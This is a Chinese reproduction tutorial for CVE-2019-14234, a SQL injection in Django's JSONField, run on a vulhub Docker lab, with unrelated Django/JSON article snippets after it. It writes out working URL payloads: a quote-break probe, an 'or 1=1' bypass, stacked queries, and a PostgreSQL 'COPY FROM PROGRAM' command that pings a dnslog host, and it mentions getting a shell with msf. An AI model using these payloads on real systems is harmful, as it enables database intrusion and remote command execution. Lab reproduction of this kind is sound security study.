首页 / JSON / CVE-2019-14234 Django JSONField SQL注入漏洞复现

CVE-2019-14234 Django JSONField SQL注入漏洞复现

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了CVE-2019-14234 Django JSONField SQL注入漏洞复现，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含3071字，纯文字阅读大概需要5分钟。

内容图文

CVE-2019-14234 Django JSONField SQL注入漏洞复现

0x01简介

Django是一款广为流行的开源web框架，由Python编写，许多网站和app都基于Django开发。

什么是JSONField，Django是一个大而全的Web框架，其支持很多数据库引擎，包括Postgresql、Mysql、Oracle、Sqlite3等，但与Django天生为一对儿的数据库莫过于Postgresql了，Django官方也建议配合Postgresql一起使用。

相比于Mysql，Postgresql支持的数据类型更加丰富，其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQL的一些特点。
CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

0x02漏洞简介

该漏洞需要开发者使用了JSONField/HStoreField，且用户可控queryset查询时的键名，在键名的位置注入SQL语句。

Django通常搭配postgresql数据库，而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现，Django的model最本质的作用是生成SQL语句，而在Django通过JSONField生成sql语句时，是通过简单的字符串拼接。

通过JSONField类获得KeyTransform类并生成sql语句的位置。

其中key_name是可控的字符串，最终生成的语句是

WHERE (field->‘[key_name]‘) =‘value‘

，因此可以进行SQL注入。
CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

0x03影响版本

Django 主开发分支

Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23

0x04环境搭建

使用vulhub的docker环境搭建

vulhub下载地址：https://github.com/vulhub/vulhub

cd vulhub/django/CVE-2019-14234/
docker-compose up -d
CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

在浏览器访问http://ip:8000出现一下页面说明搭建成功
CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

0x05漏洞利用

通过对代码的分析，可以知道如果在你的Django中使用了JSONField并且查询的“键名”可控，就可以进行SQL注入

访问http://ip:8000/admin

输入用户名admin ，密码a123123123
CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

然后构造URL进行查询，payload：

http://ip:8000/admin/vuln/collection/?detail__a‘b=123

CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

可以看到上图已经注入成功，并且可以看到构造的SQL语句，继续构造payload

http://ip:8000/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

由于or 1=1永为真，因此应该返回所有结果
CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

我们结合CVE-2019-9193我们尝试进行命令注入，构造url如下

http://192.168.10.195:8000/admin/vuln/collection/?detail__title‘)%3d‘1‘ or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

页面结果虽然报错，但是报错原因是no results to fetch，说明我们的语句已经执行

CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

使用dnslog检测是否可以执行命令

Dnslog网址：http://dnslog.cn/

Payload:

http://192.168.10.195:8000/admin/vuln/collection/?detail__title‘)%3d‘1‘ or 1%3d1 %3bcopy cmd_exec FROM PROGRAM ‘ping k1anij.dnslog.cn
‘--%20

CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

成功检测到流量
CVE-2019-14234 Django JSONField SQL注入漏洞复现 - 文章图片

复现环境里的postgresql数据库docker没对外的端口映射，如果开了或者真实环境里，还可以结合msf通过CVE-2019-9193来getshell

0x06修复方式

更新到最新版本

参考连接：https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea&chksm=903924aca74eadba5f04112b1a287f22dfbd796481012102c712ce2d66ec8cb6ff56ffbe2434&scene=21#wechat_redirect

免责申明：
本项目仅进行信息搜集，漏洞探测工作，无漏洞利用、~~***~~性行为，发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。请使用者遵守当地相关法律，勿用于非授权测试，勿用于非授权测试，勿用于非授权测试~~（重要的事情说三遍）~~，如作他用所承受的法律责任一概与东塔安全学院无关！！！

CVE-2019-14234 Django JSONField SQL注入漏洞复现

标签：model ping 框架 cmd load 编写方式 hub doc

本文系统来源：https://blog.51cto.com/14872976/2514221

内容总结

以上是互联网集市为您收集整理的CVE-2019-14234 Django JSONField SQL注入漏洞复现全部内容，希望文章能够帮你解决CVE-2019-14234 Django JSONField SQL注入漏洞复现所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/526229.html

来源：【匿名】

【上一篇】MySQL 的 JSON 数据类型【下一篇】浅析php中json_encode()和json_decode()

更多 ►

【CVE-2019-14234 Django JSONField SQL注入漏洞复现】教程文章相关的互联网学习教程文章

关于Django中JsonResponse返回中文字典编码错误的解决方案【代码】【图】

解决方案：JsonResponse(data, json_dumps_params={‘ensure_ascii‘:False})！ data是需要渲染的字典def master(request):data = {‘这是‘:‘主页‘}return JsonResponse(data, json_dumps_params={‘ensure_ascii‘:False})显示效果：　首先我们看JsonResponse()的源码：class JsonResponse(HttpResponse):　def __init__(self, data, encoder=DjangoJSONEncoder, safe=True,json_dumps_params=None, **kwargs):if safe and no...

django pymysql总是报错module 'MySQLdb.constants.FIELD_TYPE' has no attribute 'JSON'【代码】

具体什么原因我也没找到,我介绍下我的做法1. 　　重新配置一个纯净的虚拟环境,安装需要的依赖环境2.　　重启pycharm3.　　安装pymysql遇到了版本低的问题,我参照网上的方法　　https://blog.csdn.net/knight_zhou/article/details/108576312　　解决了问题,此处简单记录下找到对应的 import pymsql 所在的文件,并如下替换import pymysql pymysql.version_info = (1, 4, 13, "final", 0) pymysql.install_as_MySQLdb() ' has no att...

Django JSONField/HstoreField SQL注入(CVE-2019-14234)【代码】【图】

在逛p神的小密圈的时候发现一篇关于Django的sql注入问题,于是尝试着复现一波受影响版本：Django 2.2.x < 2.2.4Django 2.1.x < 2.1.11Django 1.11x < 1.11.23官方公告：https://www.djangoproject.com/weblog/2019/aug/01/security-releases/环境准备vulhub上面已经有相应的docker镜像了https://github.com/vulhub/vulhub/tree/7ed1b98faa901a3bcbb756935cf69e13e0d87460/django/CVE-2019-14234把整个vulhub项目可以下载下来git cl...

Django 组织json格式【代码】

@api_view([‘GET‘, ‘POST‘]) def api_test(request):classes = Classes.objects.all()# classes_data = Classes_data(classes, many=True)# userlist = Userinfo.objects.all()# userlist_data = Userinfo_data(userlist, many=True)# # data = {# ‘classes‘: classes_data.data,# ‘userlist‘: userlist_data.data,# }data = {‘classes‘: [],}for c in classes:data_item = {‘id‘: c.id,‘text‘: c.text,‘us...

无名有名分组反向解析、路由分发、名称空间、伪静态、虚拟环境、django1.X和django2.X的区别、JsonResponse、form表单上传文件、FBV与CBV【代码】

* 无名有名分组反向解析* 路由分发* 名称空间(了解)* 伪静态(了解)* 虚拟环境(了解)* django1.X和django2.X的区别(了解)* 视图层 * 三板斧 * JsonResponse * form表单上传文件 * FBV(function based view)与CBV(class based view) (视图函数既可以是函数也可以是类)### 无名有名分组反向解析```python# 无名分组反向解析 url(r‘^index/(\d+)/‘,views.index,name=‘xxx‘)# 前端 {% url ‘xxx‘ 123 %}# 后端 revers...

关于在Django中Json无法序列化datetime的解决办法【代码】【图】

我们在网页设计时经常会在前端和后台进行交互，前端回传的方法可以时redirect一个地址加上显式的参数，第二个办法就是使用Ajax结构。那么在传到view函数中进行处理后是需要通过Json格式进行返回给前端，不然前端时不认识返回的数据，此时就需要使用到Json的序列化。　　如果是从数据库中取的数据往往时queryset类型，Json无法直接序列化，需要先将其用list转成列表的形式再进行json，此方法可以解决大部分的问题，但是如果数据中包...

django object is not JSON serializable error问题解决

今天用Django1.8.2写一个购物车系统时用到session，需要序列化一个对象实例，直接用request.session[request.user.id] = cart 这样的方式会报无法序列化的错误。经过查找资料和尝试，发现原因如下。从Django 1.6开始session里面的数据都是用JSON来serialize。JSON的session只能接受简单的数据结构比如str, list, dict。有两个选择，可以先把cart的数据放在一个dict里面再存到 session或者可以换一个SessionSerializer。Django还提...

python学习-- Django进阶之路 model的 objects对象转 json【代码】

# objects_to_json: 将 model对象转化成 json# json_to_objects: 将将反序列化的json 转为 model 对象 def json_field(field_data):""" 将字典的键值转化为对象 :param field_data: :return: """ if isinstance(field_data, str): return "\"" + field_data + "\"" elif isinstance(field_data, bool): if field_data == False: return false else: return true ...

Django返回json数据用法示例

本文实例讲述了Django返回json数据用法。分享给大家供大家参考，具体如下：1、前端。jQuery发送GET请求，并解析json数据。getJSON方法可参考这里。url = "http://example/?question=" + question + "&rand=" + Math.random(); $.getJSON(url, function(json){answer = json.answer;alert(answer); });2、后端。Django接收GET请求并返回json数据。from django.http import HttpResponse from django.utils import simplejson if req...

Python开发【Django】：组合搜索、JSONP、XSS过滤

1、简单实现关联文件：from django.conf.urls import url from . import viewsurlpatterns = [url(r^index.html/$,views.index),url(r^article/(?P<article_type>\d+)-(?P<category>\d+).html/$,views.article) ]url.py<!DOCTYPE html> <html> <head><meta charset="UTF-8"><title>Title</title><style>.condition a{display:inline-block;padding: 3px 5px;border: 1px solid black;}.condition a.active{background-color: brown...

django通过ajax发起请求返回JSON格式数据的方法

本文实例讲述了django通过ajax发起请求返回JSON格式数据的方法。分享给大家供大家参考。具体实现方法如下：这是后台处理的：def checkemail(request):user = Noneif request.POST.has_key(email):useremail = request.POST[email]result = {}user = User.objects.filter(useremail__iexact = useremail)if user:result = "1"result = simplejson.dumps(result)else:result = "0"result = simplejson.dumps(result)return HttpResp...

Django中模型Model添加JSON类型字段的方法

本文实例讲述了Django中模型Model添加JSON类型字段的方法。分享给大家供大家参考。具体如下： Django里面让Model用于JSON字段，添加一个JSONField自动类型如下：class JSONField(models.TextField): __metaclass__ = models.SubfieldBase description = "Json" def to_python(self, value): v = models.TextField.to_python(self, value) try: return json.loads(v)[v] except: pass return v def get_prep_value(self, value): re...

django-将数据库数据转换成JSON格式（ORM和SQL两种情况）【代码】

def getdata(request): 2 # 使用ORM 3 # all()返回的是QuerySet 数据类型；values()返回的是ValuesQuerySet 数据类型 4 data = models.VM.objects.values(‘id‘, ‘ip‘, ‘host‘, ‘username‘) 5 data = serializers.serialize("json", tomcats) 6 return JsonResponse(list(data), safe=False)2.完全弃用Django Model层，纯SQL 转换成JSON格式1 def getdata(request): 2 # 使用SQL 3 with connection.cur...

[oldboy-django][2深入django]浏览器同源策略 + JSONP + cros

- 同源：同方法，同域名，同端口http://www.baidu.com:8000http: 方法www.baidu.com：域名8000：端口- 定义网上解析非常好的一篇http://www.ruanyifeng.com/blog/2016/04/same-origin-policy.html- 限制 ajax只能发给同源的网址；限制原理：浏览器request--->跨域服务器浏览器阻止接收<----跨域服务器响应, 服务器已经做出响应了，而且返回了，只是浏览器阻止接收- 解决策略JSONP它的基本思想是，网页通过添加...

Django JSONField/HstoreField SQL注入(CVE-2019-14234)【代码】【图】

在逛p神的小密圈的时候发现一篇关于Django的sql注入问题,于是尝试着复现一波受影响版本： Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11x < 1.11.23 官方公告：https://www.djangoproject.com/weblog/2019/aug/01/security-releases/ 环境准备 vulhub上面已经有相应的docker镜像了 https://github.com/vulhub/vulhub/tree/7ed1b98faa901a3bcbb756935cf69e13e0d87460/django/CVE-2019-14234 把整个vulhub项目可以下载下...

JSON - 最热教程

demjsonpython如何安装？简介dem指标的...基于JSON格式数据的简单jQuery幻灯片插...如何处理JSON中的特殊字符 node将geojson转shp返回给前端的实现方...nodejs更新package.json中的dependenci...怎样使用js实现前后台传输Json JavaScript使用两种方法实现url解析为j...php获取通过url的json数据，返回的是空...php判断json格式是否正确的方法 python 正则表达式与JSON-JSON

首页 / JSON / CVE-2019-14234 Django JSONField SQL注入漏洞复现

CVE-2019-14234 Django JSONField SQL注入漏洞复现

内容导读

内容图文

0x02漏洞简介

0x03影响版本

0x04环境搭建

0x05漏洞利用

0x06修复方式

内容总结

内容备注

内容手机端

【CVE-2019-14234 Django JSONField SQL注入漏洞复现】教程文章相关的互联网学习教程文章

JSON - 最新教程

JSON - 最热教程